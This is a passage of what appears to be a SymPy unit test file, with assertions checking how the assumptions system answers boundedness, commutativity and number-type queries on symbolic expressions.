assert ask(Q.irrational(z)) == False
assert ask(Q.imaginary(z)) == True
assert ask(Q.positive(z)) == False
assert ask(Q.negative(z)) == False
assert ask(Q.even(z)) == False
assert ask(Q.odd(z)) == False
assert ask(Q.bounded(z)) == True
assert ask(Q.infinitesimal(z)) == False
assert ask(Q.prime(z)) == False
assert ask(Q.composite(z)) == False
z = 1 + I
assert ask(Q.commutative(z)) == True
assert ask(Q.integer(z)) == False
assert ask(Q.rational(z)) == False
assert ask(Q.real(z)) == False
assert ask(Q.complex(z)) == True
assert ask(Q.irrational(z)) == False
assert ask(Q.imaginary(z)) == False
assert ask(Q.positive(z)) == False
assert ask(Q.negative(z)) == False
assert ask(Q.even(z)) == False
assert ask(Q.odd(z)) == False
assert ask(Q.bounded(z)) == True
assert ask(Q.infinitesimal(z)) == False
assert ask(Q.prime(z)) == False
assert ask(Q.composite(z)) == False
z = I*(1+I)
assert ask(Q.commutative(z)) == True
assert ask(Q.integer(z)) == False
assert ask(Q.rational(z)) == False
assert ask(Q.real(z)) == False
assert ask(Q.complex(z)) == True
assert ask(Q.irrational(z)) == False
assert ask(Q.imaginary(z)) == False
assert ask(Q.positive(z)) == False
assert ask(Q.negative(z)) == False
assert ask(Q.even(z)) == False
assert ask(Q.odd(z)) == False
assert ask(Q.bounded(z)) == True
assert ask(Q.infinitesimal(z)) == False
assert ask(Q.prime(z)) == False
assert ask(Q.composite(z)) == False
def test_bounded():
x, y, z = symbols('x,y,z')
assert ask(Q.bounded(x)) == None
assert ask(Q.bounded(x), Q.bounded(x)) == True
assert ask(Q.bounded(x), Q.bounded(y)) == None
assert ask(Q.bounded(x), Q.complex(x)) == None
assert ask(Q.bounded(x+1)) == None
assert ask(Q.bounded(x+1), Q.bounded(x)) == True
a = x + y
x, y = a.args
# B + B
assert ask(Q.bounded(a), Q.bounded(x) & Q.bounded(y)) == True
assert ask(Q.bounded(a), Q.bounded(x) & Q.bounded(y) & Q.positive(x)) == True
assert ask(Q.bounded(a), Q.bounded(x) & Q.bounded(y) & Q.positive(y)) == True
assert ask(Q.bounded(a), Q.bounded(x) & Q.bounded(y) & Q.positive(x) & Q.positive(y)) == True
assert ask(Q.bounded(a), Q.bounded(x) & Q.bounded(y) & Q.positive(x) & ~Q.positive(y)) == True
assert ask(Q.bounded(a), Q.bounded(x) & Q.bounded(y) & ~Q.positive(x) & Q.positive(y)) == True
assert ask(Q.bounded(a), Q.bounded(x) & Q.bounded(y) & ~Q.positive(x) & ~Q.positive(y)) == True
# B + U
assert ask(Q.bounded(a), Q.bounded(x) & ~Q.bounded(y)) == False
assert ask(Q.bounded(a), Q.bounded(x) & ~Q.bounded(y) & Q.positive(x)) == False
assert ask(Q.bounded(a), Q.bounded(x) & ~Q.bounded(y) & Q.positive(y)) == False
assert ask(Q.bounded(a), Q.bounded(x) & ~Q.bounded(y) & Q.positive(x) & Q.positive(y)) == False
assert ask(Q.bounded(a), Q.bounded(x) & ~Q.bounded(y) & Q.positive(x) & ~Q.positive(y)) == False
assert ask(Q.bounded(a), Q.bounded(x) & ~Q.bounded(y) & ~Q.positive(x) & Q.positive(y)) == False
assert ask(Q.bounded(a), Q.bounded(x) & ~Q.bounded(y) & ~Q.positive(x) & ~Q.positive(y)) == False
# B + ?
assert ask(Q.bounded(a), Q.bounded(x)) == None
assert ask(Q.bounded(a), Q.bounded(x) & Q.positive(x)) == None
assert ask(Q.bounded(a), Q.bounded(x) & Q.positive(y)) == None
assert ask(Q.bounded(a), Q.bounded(x) & Q.positive(x) & Q.positive(y)) == None
assert ask(Q.bounded(a), Q.bounded(x) & Q.positive(x) & ~Q.positive(y)) == None
assert ask(Q.bounded(a), Q.bounded(x) & ~Q.positive(x) & Q.positive(y)) == None
assert ask(Q.bounded(a), Q.bounded(x) & ~Q.positive(x) & ~Q.positive(y)) == None
# U + U
assert ask(Q.bounded(a), ~Q.bounded(x) & ~Q.bounded(y)) == None
assert ask(Q.bounded(a), ~Q.bounded(x) & ~Q.bounded(y) & Q.positive(x)) == None
assert ask(Q.bounded(a), ~Q.bounded(x) & ~Q.bounded(y) & Q.positive(y)) == None
assert ask(Q.bounded(a), ~Q.bounded(x) & ~Q.bounded(y) & Q.positive(x) & Q.positive(y)) == False
assert ask(Q.bounded(a), ~Q.bounded(x) & ~Q.bounded(y) & Q.positive(x) & ~Q.positive(y)) == None
assert ask(Q.bounded(a), ~Q.bounded(x) & ~Q.bounded(y) & ~Q.positive(x) & Q.positive(y)) == None
assert ask(Q.bounded(a), ~Q.bounded(x) & ~Q.bounded(y) & ~Q.positive(x) & ~Q.positive(y)) == False
# U + ?
assert ask(Q.bounded(a), ~Q.bounded(y)) == None
assert ask(Q.bounded(a), ~Q.bounded(y) & Q.positive(x)) == None
assert ask(Q.bounded(a), ~Q.bounded(y) & Q.positive(y)) == None
assert ask(Q.bounded(a), ~Q.bounded(y) & Q.positive(x) & Q.positive(y)) == False
assert ask(Q.bounded(a), ~Q.bounded(y) & Q.positive(x) & ~Q.positive(y)) == None
assert ask(Q.bounded(a), ~Q.bounded(y) & ~Q.positive(x) & Q.positive(y)) == None
assert ask(Q.bounded(a), ~Q.bounded(y) & ~Q.positive(x) & ~Q.positive(y)) == False
# ? + ?
assert ask(Q.bounded(a),) == None
assert ask(Q.bounded(a),Q.positive(x)) == None
assert ask(Q.bounded(a),Q.positive(y)) == None
assert ask(Q.bounded(a),Q.positive(x) & Q.positive(y)) == None
assert ask(Q.bounded(a),Q.positive(x) & ~Q.positive(y)) == None
assert ask(Q.bounded(a),~Q.positive(x) & Q.positive(y)) == None
assert ask(Q.bounded(a),~Q.positive(x) & ~Q.positive(y)) == None
a = x + y + z
x, y, z = a.args
assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.negative(y) & Q.bounded(y) & Q.negative(z) & Q.bounded(z)) == True
assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.negative(y) & Q.bounded(y) & Q.bounded(z)) == True
assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.negative(y) & Q.bounded(y) & Q.positive(z) & Q.bounded(z)) == True
assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.negative(y) & Q.bounded(y) & Q.negative(z) & ~Q.bounded(z)) == False
assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.negative(y) & Q.bounded(y) & ~Q.bounded(z)) == False
assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.negative(y) & Q.bounded(y) & Q.positive(z) & ~Q.bounded(z)) == False
assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.negative(y) & Q.bounded(y) & Q.negative(z)) == None
assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.negative(y) & Q.bounded(y)) == None
assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.negative(y) & Q.bounded(y) & Q.positive(z)) == None
assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.bounded(y) & Q.bounded(z)) == True
assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.bounded(y) & Q.positive(z) & Q.bounded(z)) == True
assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.bounded(y) & Q.negative(z) & ~Q.bounded(z)) == False
assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.bounded(y) & ~Q.bounded(z))== False
assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.bounded(y) & Q.positive(z) & ~Q.bounded(z)) == False
assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.bounded(y) & Q.negative(z))== None
assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.bounded(y)) == None
assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.bounded(y) & Q.positive(z)) == None
assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.positive(y) & Q.bounded(y) & Q.positive(z) & Q.bounded(z)) == True
assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.positive(y) & Q.bounded(y) & Q.negative(z) & ~Q.bounded(z)) == False
assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.positive(y) & Q.bounded(y) & ~Q.bounded(z)) == False
assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.positive(y) & Q.bounded(y) & Q.positive(z) & ~Q.bounded(z)) == False
assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.positive(y) & Q.bounded(y) & Q.negative(z)) == None
assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.positive(y) & Q.bounded(y)) == None
assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.positive(y) & Q.bounded(y) & Q.positive(z)) == None
assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.negative(y) & ~Q.bounded(y) & Q.negative(z) & ~Q.bounded(z)) == False
assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.negative(y) & ~Q.bounded(y) & ~Q.bounded(z)) == None
assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.negative(y) & ~Q.bounded(y) & Q.positive(z) & ~Q.bounded(z)) == None
assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.negative(y) & ~Q.bounded(y) & Q.negative(z)) == False
assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.negative(y) & ~Q.bounded(y)) == None
assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.negative(y) & ~Q.bounded(y) & Q.positive(z)) == None
assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & ~Q.bounded(y) & ~Q.bounded(z)) == None
assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & ~Q.bounded(y) & Q.positive(z)& ~Q.bounded(z)) == None
assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & ~Q.bounded(y) & Q.negative(z)) == None
assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & ~Q.bounded(y)) == None
assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & ~Q.bounded(y) & Q.positive(z)) == None
assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.positive(y) & ~Q.bounded(y)& Q.positive(z) & ~Q.bounded(z)) == False
assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.positive(y) & ~Q.bounded(y)& Q.negative(z)) == None
assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.positive(y) & ~Q.bounded(y)) == None
assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.positive(y) & ~Q.bounded(y)& Q.positive(z)) == False
assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.negative(y) & Q.negative(z)) == None
assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.negative(y)) == None
assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.negative(y) & Q.positive(z)) == None
assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x)) == None
assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.positive(z)) == None
assert ask(Q.bounded(a), Q.negative(x) & Q.bounded(x) & Q.positive(y) & Q.positive(z)) == None
assert ask(Q.bounded(a), Q.bounded(x) & Q.bounded(y) & Q.bounded(z)) == True
assert ask(Q.bounded(a), Q.bounded(x) & Q.bounded(y) & Q.positive(z) & Q.bounded(z))== True
assert ask(Q.bounded(a), Q.bounded(x) & Q.bounded(y) & Q.negative(z) & ~Q.bounded(z))== False
assert ask(Q.bounded(a), Q.bounded(x) & Q.bounded(y) & ~Q.bounded(z)) == False
assert ask(Q.bounded(a), Q.bounded(x) & Q.bounded(y) & Q.positive(z) & ~Q.bounded(z)) == False
assert ask(Q.bounded(a), Q.bounded(x) & Q.bounded(y) & Q.negative(z)) == None
assert ask(Q.bounded(a), Q.bounded(x) & Q.bounded(y)) == None
assert ask(Q.bounded(a), Q.bounded(x) & Q.bounded(y) & Q.positive(z)) == None
assert ask(Q.bounded(a), Q.bounded(x) & Q.positive(y) & Q.bounded(y) & Q.positive(z)& Q.bounded(z)) == True
assert ask(Q.bounded(a), Q.bounded(x) & Q.positive(y) & Q.bounded(y) & Q.negative(z) & ~Q.bounded(z)) == False
assert ask(Q.bounded(a), Q.bounded(x) & Q.positive(y) & Q.bounded(y) & ~Q.bounded(z)) == False
assert ask(Q.bounded(a), Q.bounded(x) & Q.positive(y) & Q.bounded(y) & Q.positive(z)& ~Q.bounded(z)) == False
assert ask(Q.bounded(a), Q.bounded(x) & Q.positive(y) & Q.bounded(y) & Q.negative(z)) == None
assert ask(Q.bounded(a), Q.bounded(x) & Q.positive(y) & Q.bounded(y)) == None
assert ask(Q.bounded(a), Q.bounded(x) & Q.positive(y) & Q.bounded(y) & Q.positive(z)) == None
assert ask(Q.bounded(a), Q.bounded(x) & Q.negative(y) & ~Q.bounded(y) & Q.negative(z) & ~Q.bounded(z)) == False
assert ask(Q.bounded(a), Q.bounded(x) & Q.negative(y) & ~Q.bounded(y) & ~Q.bounded(z)) == None
assert ask(Q.bounded(a), Q.bounded(x) & Q.negative(y) & ~Q.bounded(y) & Q.positive(z)& ~Q.bounded(z)) == None
assert ask(Q.bounded(a), Q.bounded(x) & Q.negative(y) & ~Q.bounded(y) & Q.negative(z)) == False
assert ask(Q.bounded(a), Q.bounded(x) & Q.negative(y) & ~Q.bounded(y)) == None
assert ask(Q.bounded(a), Q.bounded(x) & Q.negative(y) & ~Q.bounded(y) & Q.positive(z)) == None
assert ask(Q.bounded(a), Q.bounded(x) & ~Q.bounded(y) & ~Q.bounded(z)) == None
assert ask(Q.bounded(a), Q.bounded(x) & ~Q.bounded(y) & Q.positive(z) & ~Q.bounded(z)) == None
assert ask(Q.bounded(a), Q.bounded(x) & ~Q.bounded(y) & Q.negative(z)) == None
assert ask(Q.bounded(a), Q.bounded(x) & ~Q.bounded(y)) == None
assert ask(Q.bounded(a), Q.bounded(x) & ~Q.bounded(y) & Q.positive(z)) == None
assert ask(Q.bounded(a), Q.bounded(x) & Q.positive(y) & ~Q.bounded(y) & Q.positive(z) & ~Q.bounded(z)) == False
assert ask(Q.bounded(a), Q.bounded(x) & Q.positive(y) & ~Q.bounded(y) & Q.negative(z)) == None
assert ask(Q.bounded(a), Q.bounded(x) & Q.positive(y) & ~Q.bounded(y)) == None
assert ask(Q.bounded(a), Q.bounded(x) & Q.positive(y) & ~Q.bounded(y) & Q.positive(z)) == False
assert ask(Q.bounded(a), Q.bounded(x) & Q.negative(y) & Q.negative(z)) == None
assert ask(Q.bounded(a), Q.bounded(x) & Q.negative(y)) == None
assert ask(Q.bounded(a), Q.bounded(x) & Q.negative(y) & Q.positive(z)) == None
assert ask(Q.bounded(a), Q.bounded(x)) == None
assert ask(Q.bounded(a), Q.bounded(x) & Q.positive(z)) == None
assert ask(Q.bounded(a), Q.bounded(x) & Q.positive(y) & Q.positive(z)) == None
assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x) & Q.positive(y) & Q.bounded(y)& Q.positive(z) & Q.bounded(z)) == True
assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x) & Q.positive(y) & Q.bounded(y)& Q.negative(z) & ~Q.bounded(z)) == False
assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x) & Q.positive(y) & Q.bounded(y)& ~Q.bounded(z)) == False
assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x) & Q.positive(y) & Q.bounded(y)& Q.positive(z) & ~Q.bounded(z)) == False
assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x) & Q.positive(y) & Q.bounded(y)& Q.negative(z)) == None
assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x) & Q.positive(y) & Q.bounded(y)) == None
assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x) & Q.positive(y) & Q.bounded(y)& Q.positive(z)) == None
assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x) & Q.negative(y) & ~Q.bounded(y)& Q.negative(z) & ~Q.bounded(z)) == False
assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x) & Q.negative(y) & ~Q.bounded(y)& ~Q.bounded(z)) == None
assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x) & Q.negative(y) & ~Q.bounded(y)& Q.positive(z) & ~Q.bounded(z)) == None
assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x) & Q.negative(y) & ~Q.bounded(y)& Q.negative(z)) == False
assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x) & Q.negative(y) & ~Q.bounded(y)) == None
assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x) & Q.negative(y) & ~Q.bounded(y)& Q.positive(z)) == None
assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x) & ~Q.bounded(y) & ~Q.bounded(z)) == None
assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x) & ~Q.bounded(y) & Q.positive(z) & ~Q.bounded(z)) == None
assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x) & ~Q.bounded(y) & Q.negative(z)) == None
assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x) & ~Q.bounded(y)) == None
assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x) & ~Q.bounded(y) & Q.positive(z)) == None
assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x) & Q.positive(y) & ~Q.bounded(y) & Q.positive(z) & ~Q.bounded(z)) == False
assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x) & Q.positive(y) & ~Q.bounded(y) & Q.negative(z)) == None
assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x) & Q.positive(y) & ~Q.bounded(y)) == None
assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x) & Q.positive(y) & ~Q.bounded(y) & Q.positive(z)) == False
assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x) & Q.negative(y) & Q.negative(z)) == None
assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x) & Q.negative(y)) == None
assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x) & Q.negative(y) & Q.positive(z)) == None
assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x)) == None
assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x) & Q.positive(z)) == None
assert ask(Q.bounded(a), Q.positive(x) & Q.bounded(x) & Q.positive(y) & Q.positive(z)) == None
assert ask(Q.bounded(a), Q.negative(x) & ~Q.bounded(x) & Q.negative(y) & ~Q.bounded(y)& Q.negative(z) & ~Q.bounded(z)) == False
assert ask(Q.bounded(a), Q.negative(x) & ~Q.bounded(x) & Q.negative(y) & ~Q.bounded(y)& ~Q.bounded(z)) == None
assert ask(Q.bounded(a), Q.negative(x) & ~Q.bounded(x) & Q.negative(y) & ~Q.bounded(y)& Q.positive(z) & ~Q.bounded(z)) == None
assert ask(Q.bounded(a), Q.negative(x) & ~Q.bounded(x) & Q.negative(y) & ~Q.bounded(y)& Q.negative(z)) == False
assert ask(Q.bounded(a), Q.negative(x) & ~Q.bounded(x) & Q.negative(y) & ~Q.bounded(y)) == None
assert ask(Q.bounded(a), Q.negative(x) & ~Q.bounded(x) & Q.negative(y) & ~Q.bounded(y)& Q.positive(z)) == None
assert ask(Q.bounded(a), Q.negative(x) & ~Q.bounded(x) & ~Q.bounded(y) & ~Q.bounded(z)) == None
assert ask(Q.bounded(a), Q.negative(x) & ~Q.bounded(x) & ~Q.bounded(y) & Q.positive(z) & ~Q.bounded(z)) == None
assert ask(Q.bounded(a), Q.negative(x) & ~Q.bounded(x) & ~Q.bounded(y) & Q.negative(z)) == None
assert ask(Q.bounded(a), Q.negative(x) & ~Q.bounded(x) & ~Q.bounded(y)) == None
assert ask(Q.bounded(a), Q.negative(x) & ~Q.bounded(x) & ~Q.bounded(y) & Q.positive(z)) == None
assert ask(Q.bounded(a), Q.negative(x) & ~Q.bounded(x) & Q.positive(y) & ~Q.bounded(y) & Q.positive(z) & ~Q.bounded(z)) == None
assert ask(Q.bounded(a), Q.negative(x) & ~Q.bounded(x) & Q.positive(y) & ~Q.bounded(y) & Q.negative(z)) == None
assert ask(Q.bounded(a), Q.negative(x) & ~Q.bounded(x) & Q.positive(y) & ~Q.bounded(y)) == None
assert ask(Q.bounded(a), Q.negative(x) & ~Q.bounded(x) & Q.positive(y) & ~Q.bounded(y) & Q.positive(z)) == None
assert ask(Q.bounded(a), Q.negative(x) & ~Q.bounded(x) & Q.negative(y) & Q.negative(z)) == False
assert ask(Q.bounded(a), Q.negative(x) & ~Q.bounded(x) & Q.negative(y)) == None
assert ask(Q.bounded(a), Q.negative(x) & ~Q.bounded(x) & Q.negative(y) & Q.positive(z)) == None
assert ask(Q.bounded(a), Q.negative(x) & ~Q.bounded(x)) == None
assert ask(Q.bounded(a), Q.negative(x) & ~Q.bounded(x) & Q.positive(z)) == None
assert ask(Q.bounded(a), Q.negative(x) & ~Q.bounded(x) & Q.positive(y) & Q.positive(z)) == None
assert ask(Q.bounded(a), ~Q.bounded(x) & ~Q.bounded(y) & ~Q.bounded(z)) == None
assert ask(Q.bounded(a), ~Q.bounded(x) & ~Q.bounded(y) & Q.positive(z) & ~Q.bounded(z)) == None
assert ask(Q.bounded(a), ~Q.bounded(x) & ~Q.bounded(y) & Q.negative(z)) == None
assert ask(Q.bounded(a), ~Q.bounded(x) & ~Q.bounded(y)) == None
assert ask(Q.bounded(a), ~Q.bounded(x) & ~Q.bounded(y) & Q.positive(z)) == None
assert ask(Q.bounded(a), ~Q.bounded(x) & Q.positive(y) & ~Q.bounded(y) & Q.positive(z) & ~Q.bounded(z)) == None
assert ask(Q.bounded(a), ~Q.bounded(x) & Q.positive(y) & ~Q.bounded(y) & Q.negative(z)) == None
assert ask(Q.bounded(a), ~Q.bounded(x) & Q.positive(y) & ~Q.bounded(y)) == None
assert ask(Q.bounded(a), ~Q.bounded(x) & Q.positive(y) & ~Q.bounded(y) & Q.positive(z)) == None
assert ask(Q.bounded(a), ~Q.bounded(x) & Q.negative(y) & Q.negative(z)) == None
assert ask(Q.bounded(a), ~Q.bounded(x) & Q.negative(y)) == None
assert ask(Q.bounded(a), ~Q.bounded(x) & Q.negative(y) & Q.positive(z)) == None
assert ask(Q.bounded(a), ~Q.bounded(x)) == None
assert ask(Q.bounded(a), ~Q.bounded(x) & Q.positive(z)) == None
assert ask(Q.bounded(a), ~Q.bounded(x) & Q.positive(y) & Q.positive(z)) == None
assert ask(Q.bounded(a), Q.positive(x) & ~Q.bounded(x) & Q.positive(y) & ~Q.bounded(y) & Q.positive(z) & ~Q.bounded(z)) == False
assert ask(Q.bounded(a), Q.positive(x) & ~Q.bounded(x) & Q.positive(y) & ~Q.bounded(y) & Q.negative(z)) == None
assert ask(Q.bounded(a), Q.positive(x) & ~Q.bounded(x) & Q.positive(y) & ~Q.bounded(y)) == None
assert ask(Q.bounded(a), Q.positive(x) & ~Q.bounded(x) & Q.positive(y) & ~Q.bounded(y) & Q.positive(z)) == False
assert ask(Q.bounded(a), Q.positive(x) & ~Q.bounded(x) & Q.negative(y) & Q.negative(z)) == None
assert ask(Q.bounded(a), Q.positive(x) & ~Q.bounded(x) & Q.negative(y)) == None
assert ask(Q.bounded(a), Q.positive(x) & ~Q.bounded(x) & Q.negative(y) & Q.positive(z)) == None
assert ask(Q.bounded(a), Q.positive(x) & ~Q.bounded(x)) == None
assert ask(Q.bounded(a), Q.positive(x) & ~Q.bounded(x) & Q.positive(z)) == None
assert ask(Q.bounded(a), Q.positive(x) & ~Q.bounded(x) & Q.positive(y) & Q.positive(z)) == False
assert ask(Q.bounded(a), Q.negative(x) & Q.negative(y) & Q.negative(z)) == None
assert ask(Q.bounded(a), Q.negative(x) & Q.negative(y)) == None
assert ask(Q.bounded(a), Q.negative(x) & Q.negative(y) & Q.positive(z)) == None
assert ask(Q.bounded(a), Q.negative(x)) == None
assert ask(Q.bounded(a), Q.negative(x) & Q.positive(z)) == None
assert ask(Q.bounded(a), Q.negative(x) & Q.positive(y) & Q.positive(z)) == None
assert ask(Q.bounded(a)) == None
assert ask(Q.bounded(a), Q.positive(z)) == None
assert ask(Q.bounded(a), Q.positive(y) & Q.positive(z)) == None
assert ask(Q.bounded(a), Q.positive(x) & Q.positive(y) & Q.positive(z)) == None
x, y, z = symbols('x,y,z')
assert ask(Q.bounded(2*x)) == None
assert ask(Q.bounded(2*x), Q.bounded(x)) == True
a = x*y
x, y = a.args
assert ask(Q.bounded(a), Q.bounded(x) & Q.bounded(y)) == True
assert ask(Q.bounded(a), Q.bounded(x) & ~Q.bounded(y)) == False
assert ask(Q.bounded(a), Q.bounded(x)) == None
assert ask(Q.bounded(a), ~Q.bounded(x) & Q.bounded(y)) == False
assert ask(Q.bounded(a), ~Q.bounded(x) & ~Q.bounded(y)) == False
assert ask(Q.bounded(a), ~Q.bounded(x)) == None
assert ask(Q.bounded(a), Q.bounded(y)) == None
assert ask(Q.bounded(a), ~Q.bounded(y)) == None
assert ask(Q.bounded(a)) == None
a = x*y*z
x, y, z = a.args
assert ask(Q.bounded(a), Q.bounded(x) & Q.bounded(y) & Q.bounded(z)) == True
assert ask(Q.bounded(a), Q.bounded(x) & Q.bounded(y) & ~Q.bounded(z)) == False
assert ask(Q.bounded(a), Q.bounded(x) & Q.bounded(y)) == None
assert ask(Q.bounded(a), Q.bounded(x) & ~Q.bounded(y) & Q.bounded(z)) == False
assert ask(Q.bounded(a), Q.bounded(x) & ~Q.bounded(y) & ~Q.bounded(z)) == False
assert ask(Q.bounded(a), Q.bounded(x) & ~Q.bounded(y)) == None
assert ask(Q.bounded(a), Q.bounded(x) & Q.bounded(z)) == None
assert ask(Q.bounded(a), Q.bounded(x) & ~Q.bounded(z)) == None
assert ask(Q.bounded(a), Q.bounded(x)) == None
assert ask(Q.bounded(a), ~Q.bounded(x) & Q.bounded(y) & Q.bounded(z)) == False
assert ask(Q.bounded(a), ~Q.bounded(x) & Q.bounded(y) & ~Q.bounded(z)) == False
assert ask(Q.bounded(a), ~Q.bounded(x) & Q.bounded(y)) == None
assert ask(Q.bounded(a), ~Q.bounded(x) & ~Q.bounded(y) & Q.bounded(z)) == False
assert ask(Q.bounded(a), ~Q.bounded(x) & ~Q.bounded(y) & ~Q.bounded(z)) == False
assert ask(Q.bounded(a), ~Q.bounded(x) & ~Q.bounded(y)) == None
assert ask(Q.bounded(a), ~Q.bounded(x) & Q.bounded(z)) == None
assert ask(Q.bounded(a), ~Q.bounded(x) & ~Q.bounded(z)) == None
assert ask(Q.bounded(a), ~Q.bounded(x)) == None
assert ask(Q.bounded(a), Q.bounded(y) & Q.bounded(z)) == None
assert ask(Q.bounded(a), Q.bounded(y) & ~Q.bounded(z)) == None
assert ask(Q.bounded(a), Q.bounded(y)) == None
assert ask(Q.bounded(a), ~Q.bounded(y) & Q.bounded(z)) == None
assert ask(Q.bounded(a), ~Q.bounded(y) & ~Q.bounded(z)) == None
assert ask(Q.bounded(a), ~Q.bounded(y)) == None
assert ask(Q.bounded(a), Q.bounded(z)) == None
assert ask(Q.bounded(a), ~Q.bounded(z)) == None
assert ask(Q.bounded(a), ~Q.bounded(z) & Q.nonzero(x) & Q.nonzero(y) & Q.nonzero(z)) == None
assert ask(Q.bounded(a), ~Q.bounded(y) & ~Q.bounded(z) & Q.nonzero(x) & Q.nonzero(y) & Q.nonzero(z)) == False
x, y, z = symbols('x,y,z')
assert ask(Q.bounded(x**2)) == None
assert ask(Q.bounded(2**x)) == None
assert ask(Q.bounded(2**x), Q.bounded(x)) == True
assert ask(Q.bounded(x**x)) == None
assert ask(Q.bounded(Rational(1,2) ** x)) == None
assert ask(Q.bounded(Rational(1,2) ** x), Q.positive(x)) == True
assert ask(Q.bounded(Rational(1,2) ** x), Q.negative(x)) == None
assert ask(Q.bounded(S(2) ** x), Q.negative(x)) == True
assert ask(Q.bounded(sqrt(x))) == None
assert ask(Q.bounded(2**x), ~Q.bounded(x))==False
assert ask(Q.bounded(x**2), ~Q.bounded(x))==False
# sign function
assert ask(Q.bounded(sign(x))) == True
assert ask(Q.bounded(sign(x)), ~Q.bounded(x)) == True
# exponential functions
assert ask(Q.bounded(log(x))) == None
assert ask(Q.bounded(log(x)), Q.bounded(x)) == True
assert ask(Q.bounded(exp(x))) == None
assert ask(Q.bounded(exp(x)), Q.bounded(x)) == True
assert ask(Q.bounded(exp(2))) == True
# trigonometric functions
assert ask(Q.bounded(sin(x))) == True
assert ask(Q.bounded(sin(x)), ~Q.bounded(x)) == True
assert ask(Q.bounded(cos(x))) == True
assert ask(Q.bounded(cos(x)), ~Q.bounded(x)) == True
assert ask(Q.bounded(2*sin(x))) == True
assert ask(Q.bounded(sin(x)**2)) == True
assert ask(Q.bounded(cos(x)**2)) == True
assert ask(Q.bounded(cos(x) + sin(x))) == True
@XFAIL
def test_bounded_xfail():
"""We need to support relations in ask for this to work"""
x = Symbol('x')
assert ask(Q.bounded(sin(x)**x)) == True
assert ask(Q.bounded(cos(x)**x)) == True
assert ask(Q.bounded(sin(x) ** x)) == True
def test_commutative():
"""By default objects are Q.commutative that is why it returns True
for both key=True and key=False"""
x, y = symbols('x,y')
assert ask(Q.commutative(x)) == True
assert ask(Q.commutative(x), ~Q.commutative(x)) == False
assert ask(Q.commutative(x), Q.complex(x)) == True
assert ask(Q.commutative(x), Q.imaginary(x)) == True
assert ask(Q.commutative(x), Q.real(x)) == True
assert ask(Q.commutative(x), Q.positive(x)) == True
assert ask(Q.commutative(x), ~Q.commutative(y)) == True
assert ask(Q.commutative(2*x)) == True
assert ask(Q.commutative(2*x), ~Q.commutative(x)) == False
assert ask(Q.commutative(x + 1)) == True
